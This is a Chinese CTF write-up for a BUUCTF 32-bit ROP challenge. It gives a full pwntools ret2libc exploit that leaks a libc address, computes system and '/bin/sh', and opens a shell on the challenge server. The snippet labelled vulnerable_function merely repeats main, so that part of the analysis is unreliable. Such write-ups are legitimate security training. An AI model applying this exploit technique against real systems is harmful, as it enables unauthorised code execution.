铁人三项(第五赛区) 2018 rop
# 铁人三项(第五赛区) 2018 rop
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/铁人三项_第五赛区_2018_rop/2018_rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
be_nice_to_people();
vulnerable_function();
return write(1, "Hello, World\n", 0xDu);
}
1
2
3
4
5
6
2
3
4
5
6
vulnerable_function函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
be_nice_to_people();
vulnerable_function();
return write(1, "Hello, World\n", 0xDu);
}
1
2
3
4
5
6
2
3
4
5
6
# 思路分析
目前信息:
vulnerable_function函数内明显的栈溢出漏洞- No PIE
- NX 保护开启
- 无后门函数
思路:
- 本题是标准的
ret2libc,应先泄漏libc及函数地址,再利用泄漏的信息构造payload,执行获取shell
- 本题是标准的
# exp
from pwn import *
from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/铁人三项_第五赛区_2018_rop/2018_rop'
io = remote('node4.buuoj.cn', 28626)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc_start_main_addr = elf.got['__libc_start_main']
write_addr = elf.plt['write']
vulnerable_function_addr = elf.symbols['vulnerable_function']
padding = 0x88+4
pop_3times_ret = 0x0804855d
payload = flat(['a'*padding, write_addr, pop_3times_ret, 1,libc_start_main_addr, 4, vulnerable_function_addr])
io.sendline(payload)
leak_libc_start_main_addr = u32(io.recv())
libc = LibcSearcher('__libc_start_main', leak_libc_start_main_addr)
libcbase = leak_libc_start_main_addr-libc.dump('__libc_start_main')
system_addr = libcbase+libc.dump('system')
bin_sh_addr = libcbase+libc.dump('str_bin_sh')
payload = flat(['a'*padding, system_addr, 0xdeadbeef, bin_sh_addr])
io.sendline(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
上次更新: 2022/08/15, 00:29:49